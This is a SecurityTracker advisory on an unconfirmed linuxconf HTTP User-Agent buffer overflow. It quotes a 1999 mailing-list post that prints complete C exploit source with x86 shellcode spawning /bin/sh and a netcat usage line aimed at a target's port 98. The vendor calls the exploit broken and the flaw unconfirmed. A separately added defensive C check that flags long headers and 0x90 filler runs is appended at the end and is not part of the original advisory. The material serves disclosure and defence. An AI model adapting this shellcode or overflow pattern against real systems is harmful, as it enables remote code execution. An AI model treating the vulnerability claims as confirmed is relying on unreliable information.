SecurityTracker.com
Category:  Application (Generic)  >  Linuxconf
Vendors:  Gelinas,Jacques et al
Linuxconf USER_AGENT Potential Buffer Overflow May Permit Remote Code Execution
SecurityTracker Alert ID:  1009166
CVE Reference:  CAN-2000-0017
Date:  Feb 23 2004
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Description:  In December 1999, a potential buffer overflow vulnerability was reported in linuxconf. A remote user may be able to execute arbitrary code on the target system.

An exploit [contained in the Source Message] that purports to trigger a buffer overflow in the processing of the HTTP USER_AGENT field was reported.

[Editor's note: As posted in 'http://lwn.net/1999/1223/a/linuxconfresponse.html', the vendor was unable to reproduce the vulnerability. The vendor also notes that the exploit is broken. The CVE entry for this item (CAN-2000-0017) lists 4 'NOOP' votes and 2 'REJECT' votes.]

Impact:  A remote user may be able to execute arbitrary code on the target system.

[Editor's note: This vulnerability is unconfirmed.]

Solution:  This vulnerability is unconfirmed.
Vendor URL:  www.solucorp.qc.ca/linuxconf/
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Elias Levy <aleph1@SECURITYFOCUS.COM>
Message History:   None.


 Source Message Contents

Date:  Tue, 21 Dec 1999 10:31:14 -0800
From:  Elias Levy <aleph1@SECURITYFOCUS.COM>
Subject:  (Possible) Linuxconf Remote Buffer Overflow Vulnerability

 

There may exist a buffer overflow vulnerability in the Linuxconf package
shipped with some versions of Linux systems. The vulnerability may
be in the program's handling of HTTP headers. Initial testing with
Linuxconf 1.16r10 under RedHat 6.0 was inconclusive. If others can
test the exploit and report their results it would be appreciated.

This is an example of what good can happen from sharing security
incident information. There have been reports in the INCIDENTS mailing
list for several months now of scans for port 98. Since no
publicly known major vulnerabilities existed in this service the
traffic was somewhat strange. After some digging around
Jon Starnaud <jon.starnaud_at_rci.com> was able to find this exploit.

If you are not subscribed to INCIDENTS and wish to share incident
information I suggest you sign up. If the vulnerability does exist
this would be the second vulnerability we discover thanks to sharing
incident information (the first one being sadmind).

http://www.securityfocus.com/forums/incidents/faq.html

/*

   linuxconf exploit by R00T-X (c) 1999

   USER_AGENT overflow x86
   should work on all linux's but you need to have
   network access to linuxconf

   greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P

   have fun with this but for EDUCATIONAL PURPOSES :)

   Usage: (./linexp <offset>;cat)| nc targethost 98

  */

char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
"\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
"\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xe8\xc0\xff\xff\xff/bin/sh\x00";

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 1025
#define NOP 0x90

void
main (int argc, char *argv[])
{
   char buf[BUFLEN];
   int offset,nop,i;
   unsigned long esp;
   char shell[1024+300];

   if(argc < 2)
   {
      fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98\n", argv[0]);
      exit(0);
   }

   nop = 511;
   esp = 0xefbfd5e8;
   offset = atoi(argv[1]);

   memset(buf, NOP, BUFLEN);
   memcpy(buf+(long)nop, shell, strlen(shell));

   for (i = 256; i < BUFLEN - 3; i += 2)
   {
      *((int *) &buf[i]) = esp + (long) offset;
      shell[ sizeof(shell)-1 ] = 0;
   }

   printf("POST / HTTP/1.0\r\nContent-Length: %d, User-agent: \r\n", BUFLEN);
   for (i = 0; i < BUFLEN; i++)
     putchar(buf[i]);

   printf("\r\n");

   return;
}

--
Elias Levy
Security Focus
http://www.securityfocus.com/
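
A defensive counterpart to the "Boundary error" cause listed above, added here as an example (not code from linuxconf, SecurityTracker or the original post): a pre-parse check that rejects a request whose request line or headers exceed a length limit or carry a long run of 0x90 filler bytes, the padding the posted program writes into its request. The limits, the function names and the sample requests are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#define MAX_HEADER_LINE 512 /* assumed policy limit, not a linuxconf value */
#define MAX_FILLER_RUN 32   /* assumed threshold for repeated 0x90 bytes */
enum verdict { REQ_OK, REQ_LINE_TOO_LONG, REQ_FILLER_RUN };

/* Length of the longest run of byte b in buf[0..len). */
static size_t longest_run(const unsigned char *buf, size_t len, unsigned char b)
{
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < len; i++) {
        cur = (buf[i] == b) ? cur + 1 : 0;
        if (cur > best) best = cur;
    }
    return best;
}

/* Check the request line and each header line, stopping at the blank line. */
enum verdict check_request(const unsigned char *req, size_t len)
{
    for (size_t i = 0, start = 0; i <= len; i++) {
        if (i < len && req[i] != '\n') continue;   /* not at a line end yet */
        size_t n = i - start;
        if (n > 0 && req[i - 1] == '\r') n--;      /* strip the CR of CRLF */
        if (n == 0) break;                         /* end of headers */
        if (longest_run(req + start, n, 0x90) > MAX_FILLER_RUN) return REQ_FILLER_RUN;
        if (n > MAX_HEADER_LINE) return REQ_LINE_TOO_LONG;
        start = i + 1;
    }
    return REQ_OK;
}

/* Constructed sample: a User-Agent header holding `fill` copies of byte b. */
enum verdict check_sample(unsigned char b, size_t fill)
{
    unsigned char req[2048];
    const char *head = "POST / HTTP/1.0\r\nUser-Agent: ";
    size_t n = strlen(head);
    if (fill > sizeof req - n - 4) fill = sizeof req - n - 4;
    memcpy(req, head, n);
    memset(req + n, b, fill);
    memcpy(req + n + fill, "\r\n\r\n", 4);
    return check_request(req, n + fill + 4);
}

int main(void)
{
    printf("%d %d %d\n", check_sample('A', 20), check_sample('A', 1025), check_sample(0x90, 100));
    return 0;
}
```

A front end would run this check on the raw bytes before any header value is copied into a fixed-size buffer, and log the verdict together with the source address.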

 



Copyright 2004, SecurityGlobal.net LLC